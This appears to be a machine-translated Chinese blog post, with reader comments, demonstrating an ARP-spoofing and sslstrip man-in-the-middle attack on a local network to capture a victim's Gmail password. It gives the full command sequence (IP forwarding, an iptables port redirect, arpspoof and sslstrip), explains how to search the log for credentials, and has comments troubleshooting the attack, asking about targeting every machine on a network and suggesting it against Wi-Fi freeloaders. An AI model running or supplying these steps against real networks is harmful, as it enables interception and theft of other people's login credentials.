ArpSpoofing和SSlstrip在行动。

您好Blogger。

今天,我只是一小部分样本,说明连接到我们许多人喜欢的任何不安全网络可能有多危险。

今天,我将通过Sslstrip使用ArpSpoofing来获取Gmail密码。 为了更好地控制环境,我创建了一个名为“testarp@gmail.com“。

而且由于我不太喜欢序言,所以让我们开始做生意。

我对他们使用以下信息所做的任何事情均不承担任何责任。 我完全出于教育目的这样做

环境

对于此测试,我们具有以下内容:

1.攻击者: 具有Debian Wheezy的是我的台式机或台式计算机。 您可以从存储库中安装 sslstrip y 嗅探 拥有 伪造

2.受害人: 受害者是一个Android平板电脑,它只想通过浏览器查看他的邮件。

3.媒介: 中间是我的 思科DPC2425路由器

地址。

攻击者地址: 172.26.0.2

路由器地址:172.26.0.1

受害者的地址: 172.26.0.8

攻击:

要多了解攻击的工作原理,可以转到我的 解决方案&帖子

对于此攻击,我们要做的第一件事是激活转发,以便我们的计算机可以将信息转发给受害者,而无需他们意识到。 (否则将拒绝服务攻击)

为此,我们将使用:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

每个命令都在直接控制台窗口中。

现在如果我们执行 tail -f desdelinux 我们直接看到实时信息

快照1

那么,我们如何得到想要的呢?

首先让我们在平板电脑上输入我们的邮件。 登录时,我们看到控制台上出现了成千上万的东西。

现在已经完成了,让我们打开我们的文件“desdelinux” 与纳米

nano desdelinux

使用Control + W,我们搜索称为SECURE POST的内容。

我们将看到类似这样的内容。

快照2

受害者的电子邮件和密码是那条看不见的大字句。

因此,我们向右行驶,直到最终看到隧道尽头的灯。

快照3

在另一个场合,我们将看到我们如何才能稍微保护自己免受这些攻击。

问候


发表您的评论

您的电子邮件地址将不会被发表。 必填字段标有 *

*

*

  1. 负责数据:MiguelÁngelGatón
  2. 数据用途:控制垃圾邮件,注释管理。
  3. 合法性:您的同意
  4. 数据通讯:除非有法律义务,否则不会将数据传达给第三方。
  5. 数据存储:Occentus Networks(EU)托管的数据库
  6. 权利:您可以随时限制,恢复和删除您的信息。

  1.   @jlcmux

    我借此机会说,发布该帖子时,命令不正确。

    末尾的iptables命令缺少另一行上的8080。 然后arpspoof命令都在同一行上。 每个命令在不同的行上。

    希望编辑者可以看到并修复它。

    问候。

    1.    曼努埃尔·德拉·富恩特

      我已经做了您提到的更正,可以吗?

      如果要在首选条目中插入代码,请使用HTML视图,并在将文章发送到待处理之前验证文章是否正确。 谢谢。

  2.   路易斯

    知道我们这些没有知识的人是如此脆弱,真是令人不寒而栗。 即使我对这门学科了解甚少,也可以得到很好的信息,我也意识到了它的重要性。 谢谢!
    问候

  3.   吉卡德

    但这仅在攻击者和受害者位于同一网络上时才有效。 无论如何,在我看来,如果(在同一网络上)使用HTTPS进行连接不会发生这种情况,因为在离开您的计算机之前已对数据进行了加密。 如果您通过HTTP(不带S)进行连接,我认为即使查看网络电缆,您也会看到按键。

    1.    @jlcmux

      这不是真的。 我正在破解gmail密码,如果您发现gmail使用https。 所以? 关键是,尽管https是安全的,但它取决于http。 所以它不是那么安全。

      不要对HTTP承认太多,以至于S不适合超人使用,而是指“安全”使用

    2.    en

      它可以在有或没有https的情况下使用,我已经在更专业的linux发行版中进行了尝试,并且没有问题

    3.    曼努埃尔·德拉·富恩特

      您可以精确地使用它为那些窃取您的Wi-Fi的人教课。 😀

      这或多或少就像他们很久以前在Chema Alonso的博客上所说的那样:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    人造丝

        Ostia,它的功能非常棒!/然后,当我去检查银行帐户时,每次我使用VPN时,他们都会告诉我偏执狂……)。 顺便说一句,您必须看到评论中的人持愤世嫉俗的态度……如果最终是在偷窃……

        1.    埃利奥时间3000

          现在,我们需要学习有关如何创建和提供自己的VPN服务的教程。

      2.    丹尼尔

        您链接的故事非常有趣,甚至还值得一本新书,这使我想起了我使用邻居的互联网时的经历,尽管我说我知道这个话题,但我认为我永远也看不到幸运的是,对我而言,他们只将密码更改为WPA2,这就是我与ISP的故事开始的地方哈哈

    4.    毛里求斯

      这就是标题中提到Sslstrip的原因。

      只要攻击者在中间,它就可以工作

  4.   不久

    你在棱镜工作什么波浪? -.-
    没有。
    您还在等什么发送XD请求
    问候
    好帖子

  5.   奥罗斯

    有趣的是,我稍后再做一个教育测试。也许我什至可以删除WiFi的密码,然后玩一会儿😛
    您是否有机会通过类似的操作将不同的页面发送到目标请求的页面? 例如,他们想打开Facebook,而我将他们重定向到Google? 😛

    1.    @jlcmux

      是。 但这是完全不同的一卷。

      也许我以后再发布。

  6.   Lastnewbie

    很好的帖子,这些话题很有教育意义,现在我们需要能够抵御这种攻击,因为有些人(例如我)连接到公共网络(例如大学),避免这种攻击将很有帮助。

    的问候!

  7.   另一个dl用户

    这对我没用🙁

  8.   沃克斯

    除了通过服务器证书(一旦您的计算机上有证书,浏览器负责加密)通过服务器证书对https连接进行加密(使用iptables)重定向了端口80(http)而不是443以外,我在这里有些失败这是https

    1.    @jlcmux

      我也这么认为。 关键是,尽管https是“安全的”,但不幸的是它依赖于http。 因此,sslstrip利用了这一点,它使浏览器认为它使用的是https凭据,但没有使用。

      1.    沃克斯

        天哪! 但浏览器应该会看到类似“此证书来自可疑网站或类似内容的警告”之类的警告……我绝对必须对XD进行测试

        1.    @jlcmux

          不,绝对没有任何结果。

  9.   另一个dl用户

    终于对我有用
    我使用密码连接到WEP网络,无论如何它直接向我显示了密码。

    一个问题。 您是否可以对网络中连接的所有计算机执行相同的步骤,而不要让一个受害者受害?

    1.    @jlcmux

      是的你可以。 但是我还没有做实验。 自己尝试,并告诉我们您的状况。

  10.   辛尼克19

    我唯一得到的是受害者的机器脱机,但是sslstrip没有显示任何信息:/

    1.    @jlcmux

      您需要暂时禁用防火墙。 或至少启用传入连接。

  11.   布莱克先生

    探针,我只能看到Facebook页面的用户名和密码,在gmail中,我在日志中没有找到任何结果,我也只需要一行arpspoof«arpspoof -i -t«。 另一方面,受害机器无法打开某些页面。 我将继续调查,这很有趣。 对于使用Manjaro的用户而言,要安装的软件包对dsniff(这里是arpspoff),twisted和python2-pyopenssl有所帮助。 可以从这里下载Sslstrip: http://www.thoughtcrime.org/software/sslstrip/
    运行它$ python2 sslstrip.py
    问候。

  12.   布莱克先生

    它没有出来,但是arpspoof行是:#arpspoof -i int -t ip-victim ip-router

  13.   吉尔伯特

    看我完全按照你的意思说:

    echo“ 1”> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    问题是受害者是我在房间里的另一台电脑,我无法连接到必须重启路由器的位置,我该怎么办?

    我正在使用虚拟机的另一件事是,当我执行iwconfig命令时,不会显示wlan0,也不会在执行ifconfig时显示,但是如果我的虚拟机上有Internet,则带有eth0接口。